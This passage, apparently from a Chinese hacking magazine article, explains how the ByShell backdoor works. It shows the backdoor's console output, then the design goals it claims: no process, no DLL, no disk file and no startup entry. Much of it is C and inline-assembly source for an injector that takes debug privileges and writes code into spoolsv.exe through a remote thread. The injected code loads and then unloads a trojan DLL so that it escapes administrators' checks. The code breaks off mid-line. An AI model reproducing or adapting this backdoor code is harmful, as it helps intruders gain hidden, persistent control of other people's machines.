456   svchost.exe   11     260
488   SPOOLSV.EXE   14     260
524   msdtc.exe     21     260
636   svchost.exe   18     260
656   llssrv.exe     9     260
688   sqlservr.exe   28     260
776   winmgmt.exe   3     260
812   dfssvc.exe     2     260
832   inetinfo.exe   29     260
856   mssearch.exe   6     260
1224   svchost.exe   11     260
1176   explorer.exe   19     1172
1356   igfxtray.exe   2     1176
1404   PFWMain.exe   4     1176
1412   SOUNDMAN.EXE   2     1176
1428   realsched.exe   4     1176
1436   internat.exe   1     1176
1444   sqlmangr.exe   3     1176
1280   BitComet.exe   9     1176
328   notepad.exe   2     1176
1196   MDM.EXE 5     456
1512   conime.exe     1     1088
1520   cmd.exe 1     488
1504   by063cli.exe   1     1176
#pskill1428
OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
#modlist1520

mods of 1520:
module_id     module_name   module_path
1     ntdll.dll     C:WINNTSystem32ntdll.dll
1     KERNEL32.dll   C:WINNTsystem32KERNEL32.dll
1     USER32.dll     C:WINNTsystem32USER32.dll
1     GDI32.DLL     C:WINNTsystem32GDI32.DLL
1     ADVAPI32.dll   C:WINNTsystem32ADVAPI32.dll
1     RPCRT4.DLL     C:WINNTsystem32RPCRT4.DLL
1     MSVCRT.dll     C:WINNTsystem32MSVCRT.dll
1     IMM32.DLL     C:WINNTSystem32IMM32.DLL
#
好了，就介绍这三个最普通的功能吧。其实在很多场合，这三个功能是最基本的功能，也是最难确保稳定性的三个问题疑难，不过这个后门最突出的特色应该是无进程、无DLL、无硬盘文件、无启动项的实现，在实际的使用过程中相信大家会发现它的优点，下面我们从设计和编程的角度来看这些功能是如何实现的。

设计&编程
  在这一部分中我不列举完整的代码，因为它太长了，我将引用关键代码来说明编写思路。
首先是怎样隐藏自身的进程？一个普遍采用的方法就是远程线程注射。但它最大的问题是注射代码到了远程进程的地址空间后，由于地址空间的变化，依赖于原来地址空间的所有直接寻址指令需要重定位。这点对汇编老手来手是很容易理解的，对高级语言程序编写者来说这意味着所有显式和非显式的全局变量（如API地址和字符串）都需要进行手工重定位。
相比于病毒程序，我们很幸福，因为我们的的注射器可以同时向远程进程注射一个“全局变量块”，再把这个块的地址传送到远程函数，然后在远程函数中使用这个块来替代直接寻址的全局变量，从而免于编写完全“自身可重定位”的代码。后者被认为是非常烦琐并且几乎无法用高级语言实现的。但即使是这样，编写可以重定位的代码复杂度仍然比较大，写功能模块比较多的后门程序将会非常累。农民前辈的Cmdbind2实现了完全手工重定位的注射后门，我们看他的源代码可以发现他仅仅在实现最普通的Bind Shell上就花费了很多代码，像ByShell v0.64这样的功能复杂的后门，如果也这样实现功能的话，无疑是难以想象的。
  取代直接编写可重定位代码的普遍方法是在注射进入远程进程的函数中加载一个DLL，这样的话系统将为你做重定位工作，后门主要功能实现在DLL中。例如以前的黑防中，单长虹介绍过这种方法。这种方法也有一个小弊端就是管理员在审核被你注射的进程时会发现一个不明的DLL从而导致后门暴露。农民前辈提出了一种思路，先加载DLL，然后把这一块内存全部拷贝到其它地方，卸载DLL，再申请与原来加载DLL相同的地址空间，把其它地方“寄存”的DLL代码拷贝回这个空间。然后直接调用这个DLL，就解决了所有的重定位问题，还不会在被注射进程的加载模块列表里出现我们的DLL。农民前辈并没有实现他的想法为代码，一会给出我用这种方法实现的主要代码。
  进行比较讨论时我们也来讨论其它的系统级隐藏进程方法。Bingle采用替代Svchost启动的DLL服务的方法来加载后门，ZXshell也使用了这种方法。这种方法的主要问题是不稳定，必须改写注册表敏感键值并在Svchost.exe的加载模块中出现不明模块。当然如果用和原来同名的木马DLL来替代原来的DLL可以避免以上问题，但是又会遇到新的问题，就是怎样绕过Windows的系统文件保护和管理员例行的系统文件完整性检查。
  Hxdef统一采用Hook ring3 API（主要是Ntdll.dll的NativeAPI）的方法完成自身各个方面的隐藏。这种方法对于一般的Ring3检查效果很好，并且可以部分实现端口复用。它的主要问题有Ring3下Hook的手段不多，而且比较“兴师动众”（Hxdef向系统中所有进程注射木马数据），效果还不是很好，极易被Ring0的RootKit Detector发现，如ICESWORD。最后还有就是编程烦琐。
  我选用了注射远程进程Spoolsv.exe，假脱机打印服务的方法，并且在注射到远程的函数中加载然后卸载了一个木马DLL——Ntboot.dll，注射器则是Ntboot.exe。请看代码：

void injcode(){HANDLE prohandle;//注射对象进程句柄
DWORD pid=0;//对象进程PID
int ret; //临时变量

//使用toolhelp32函数得到注射对象PID
Sleep(1000);
HANDLE snapshot;
snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
char injexe[]="spoolsv.exe";//注射对象进程，大家可以自己改
for(Process32First(snapshot,&processsnap);
Process32Next(snapshot,&processsnap);)
}
CloseHandle(snapshot);//得到PID
//取得SE_DEBUG_NAME权限
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
//现在注射
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
DWORD WINAPI injfunc(LPVOID);//Injfunc就是注射的函数，需要手工重定位
//下面取得需要用的API地址并写进将要注射的全局变量块，Injapistr是全局结构，是全局变量块的内容
HMODULE hModule;
LPVOID paramaddr;//全局变量块地址
hModule=LoadLibrary("kernel32.dll");
injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
//在目标进程里分配“全局变量块”，并写入API地址
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
//写入Injfunc函数
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
//激活远程线程
CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
CloseHandle(prohandle);
return;
}
//注射到远程的函数，负责完成加载和卸载功能复杂的木马DLL的艰巨任务
DWORD WINAPI injfunc(LPVOID paramaddr){
//paramaddr，全局变量块首址。所有静态全局变量都需要重定位（直接寻址的），而动态分配（堆，Virtualalloc）和栈变量不需要，因为他们使用间接寻址。其实字符串也可以在刚才写进全局变量块，但是字符串不多，这里直接用ASM搞定。
char ntboot[16];
char msgbox[16];//变量名字起错了，应该是DLL的后门主函数名。汗，希望不要误导大家。
INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;
__asm{
mov ntboot,’n’
mov ntboot+1,’t’
mov ntboot+2,’b’
mov ntboot+3,’o’
mov ntboot+4,’o’
mov ntboot+5,’t’
mov ntboot+6,’.’
mov ntboot+7,’d’
mov ntboot+8,’l’
mov ntboot+9,’l’
mov ntboot+10,0
mov msgbox,’C’
mov msgbox+1,’m’
mov msgbox+2,’d’
mov msgbox+3,’S’
mov msgbox+4,’e’
mov msgbox+5,’r’
mov msgbox+6,’v’
mov msgbox+7,’i’
mov msgbo